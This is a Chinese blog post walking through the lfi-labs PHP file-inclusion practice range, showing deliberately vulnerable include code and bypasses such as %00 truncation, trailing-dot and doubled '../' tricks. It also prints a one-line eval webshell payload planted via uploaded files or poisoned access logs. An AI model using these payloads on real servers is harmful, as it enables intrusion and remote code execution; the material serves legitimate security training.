文件包含漏洞

最新推荐文章于 2024-05-20 08:38:41 发布
最新推荐文章于 2024-05-20 08:38:41 发布
阅读量432 收藏 2
点赞数
分类专栏: web渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45291045/article/details/109610857
版权

文章目录

文件包含漏洞产生原因

在包含文件时,为了灵活包含文件,将被包含文件设置为变量,同过动态变量来引入需要包含的文件时,用户可以对变量的值可控未对变量值进行合理的效验或者效验被绕过,这样就导致了文件包含漏洞

文件包含函数

include //会生成致命错误并停止脚本
include_once //语句在脚本执行期间包含并运行指定文件

require //只生成警告(E_WARNING),并且脚本会继续
require_once //断一下这个文件在之前是否已经被包含过,如已经包含,则忽略本次包含

文件包含漏洞分类

  • 本地文件包含
  • 远程文件包含

allow_url_fopen为On时,能读取远程文件,列如file_get_contents()就能读远程文件
allow_url_include为On时,就可以使用include和require等方式包含文件

文件包含靶场练习

靶场下载:lfi-labs-master

LFI-1

简单的文件包含漏洞,可以包含主机上的所有文件,被包含的文件都会被当做php执行,文件包含可以是相对路径使用“…/”跳到上级目录,也可是绝对路径“c:\1.txt”
在这里插入图片描述

LFI-2 %00阶段绕过

代码

<?php include("includes/".$_GET['library'].".php"); ?>

包含phpinfo.php时会变成

../../../phpinfo.php.php

这个文件系统认不出来就不会执行,使用%00截断绕过

../../../phpinfo.php%00.php //%00后边的会被截断

也可以使用系统特性绕过
window下当文件名大于256之后的会被丢弃掉

...............................................................................................................................................................................................................................................................

LFI- 3 后缀加点.绕过

代码

<?php
if (substr($_GET['file'], -4, 4) != '.php')//截取传参的后4位,如果等于.php,不允许查看文件
 echo file_get_contents($_GET['file']);
else
 echo 'You are not allowed to see source files!'."\n";
?>

输入当输入…/…/phpinfo.php时,截取后4位检测到是.php就无法查看文件
使用phpinfo.php. 截取后4位php. 检测不到就会执行,执行时计算机会自动的把后面的点去掉
在这里插入图片描述

LFI- 4 不加后缀绕过

代码


<form action="/LFI-4/index.php" method="GET">
    <input type="text" name="class">
</form>

<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>

addslashes函数过滤了空字符%00无法使用,不加后缀即可绕过
在这里插入图片描述

LFI- 5 双写绕过

代码

<?php
   $file = str_replace('../', '', $_GET['file']);//把传参中带有../的字符替换成空
   if(isset($file))
   {
       include("pages/$file");
   }
   else
   {
       include("index.php");
   }
?>

…/被替换成空,使用双写绕过…/./,经过一次替换成空后变成…/
在这里插入图片描述


# 文件包含利用
## 文件包含写shell

文件包含漏洞可以配合文件上传写shell,假设1.txt是我们上传的图片,里面写着下列代码

```php
<?php fputs(fopen('shell.php','w'),'<?php eval($_REQUEST[1]);?>');?>//生成一个文件shell.php,里面内容<?php eval($_REQUEST[1])>

当我们包含这个txt文件的时候,会被当做PHP解析,里面的代码就会执行
生成一个shell.php
在这里插入图片描述里面的内容写着一句话木马
在这里插入图片描述

包含日志文件获取webshell

利用条件要有文件包含漏洞,要知道日志文件的路径
当我们访问下面的url的时候,记录会被记录在日志文件中
在这里插入图片描述查看日志,访问的地址在日志中在这里插入图片描述里面的php代码<?被浏览器自动编码使用burp抓包修改即可

在这里插入图片描述包含日志文件
在这里插入图片描述

file_put_contents(‘1.php’,’<?php eval($_REQUEST(‘a’))>’);

echo "大佬们吃饭了"
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含漏洞靶场练习
ximo的博客
02-13 1653
目录Lfi-Labs说明LFI-1LFI-2LFI-3LFI-4LFI-5ctfshowweb 78web 79web 80-81web 82-86web 87web 88 Lfi-Labs 说明 该环境为phpstudy搭建,在网站根目录下存在phpinfo.php;以此为例。 LFI-1 源码: <?php include($_GET["page"]); ?> payload: ?page=phpinfo.php 发现并没用成功,使用 ../ 返回上一级目录 LFI-2 源码: &lt
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
### 文件包含漏洞的原理与实践 #### 一、文件包含漏洞概述 文件包含漏洞是一种常见的Web应用程序安全漏洞,尤其在使用PHP语言开发的应用程序中较为普遍。这种漏洞允许攻击者通过控制程序中用于指定要包含文件的...
网络安全、渗透测试靶场全集
qq_37776764的博客
04-26 842
writeup文章:https://github.com/niudaii/my-vulstack-wp。封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。武汉安鸾学院 – 武汉网络安全培训-渗透测试培训-Web安全培训。在线演示: http://vulfocus.fofa.so/10.python2的常见漏洞靶场(python2)LFI-labs 和本地文件包后漏洞利用靶场。Sqli-Labs:(sql注入靶场)3.韩国Webhacking。
文件包含漏洞全面详解
最新发布
qq_53058639的博客
05-20 866
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
CTF.show 文件包含
m0_64444909的博客
08-25 1824
ctf文件包含
ctfshow 文件包含
qq_74806534的博客
03-23 581
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
sqli-labs-master靶场搭建流程(附下载链接)
qq_50744304的博客
08-03 1152
将其中的dbuser改为数据库root账户名,dbpass改为数据库root账户密码,host可以改为127.0.0.1,也可以不改,别的不用动,改完后保存。注意:下载的最新版phpstudy自带的php版本为7.0以上,sqli靶场不支持,所以可以切换为低版本,我用的是5.3.29。不知道数据库名可以打开phpstudy,打开数据库就可以更改数据库root密码,默认密码为root。将sqli的压缩包移动到文件夹内并解压,解压后文件名可改为sqli,进入网站更便捷。后续会逐渐更新每一关的流程哦,欢迎关注!
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞是Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
LFI本地包含漏洞介绍php的
03-24
LFI本地包含漏洞介绍php的 这个是最新的2011年最新公布的。
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集.zip
09-18
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集 lfi实验室用于实践开发 LFI 。RFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。这些不是用来评估appsec测试工具的。这个想法是将这些添加到
php 伪造本地文件包含漏洞的代码
10-28
本地文件包含漏洞允许攻击者通过修改动态包含文件的路径,来读取服务器上的任意文件。这不仅可能导致敏感信息泄露,还可能被利用来执行恶意代码或进一步控制服务器。 #### 三、漏洞原理分析 在上述示例代码中,...
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
sqli-labs-master靶场搭建详细过程(附下载链接)
ran的博客
01-11 2680
在安装好的phostudy中点击“软件管理”,下滑找到“php5.5.9nts”后点击“安装”,安装完成后如下图所示。在“WWW\sqli-labs\sql-connections”路径下找到“db-creds.inc”文件。之后点击“网站”-->“管理”-->php版本,选择刚刚安装的“php5.5.9nts”。将解压缩好的“sqli-labs-master”文件夹移动到“WWW”目录下。打开后找到“$dbpass =”,在后面输入数据库的密码,默认是“root”。“后会进入如下页面。
文件上传之00截断
华丽的贵族
10-02 6250
文件上传之—00截断 1.什么是00截断 事实上0x00,%00,/00这三类阶截断都是属于同种原理,只是表示不同而已 下面是用 URL 编码形式表示的 ASCII 字符 在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,表示字符串结束,所以当url中出现%00时就会认为读取已结束 ...
安鸾靶场-LFI本地文件包含 LFI本地文件包含LF2 文件包含漏洞练习记录
AAAAAAAAAAAA66的博客
02-04 2841
记得几个月刚接触CTF就遇到了一个文件包含漏洞题目 i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞_AAAAAAAAAAAA66的博客-CSDN博客 记得当时的想法就是既然啥也不会,就先记下方法和操作,等最后熟悉了再对原理进行深究。 现在过了一段时间后感觉对文件包含的理解更深一步了。算是有了一点独立思考和解决问题的能力吧。 文件包含漏洞 简单一点讲,用include()函数处理的文件,都会被当成PHP代码执行。 这个文件包括字符串,图片(图片嵌入一句话木马),...
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值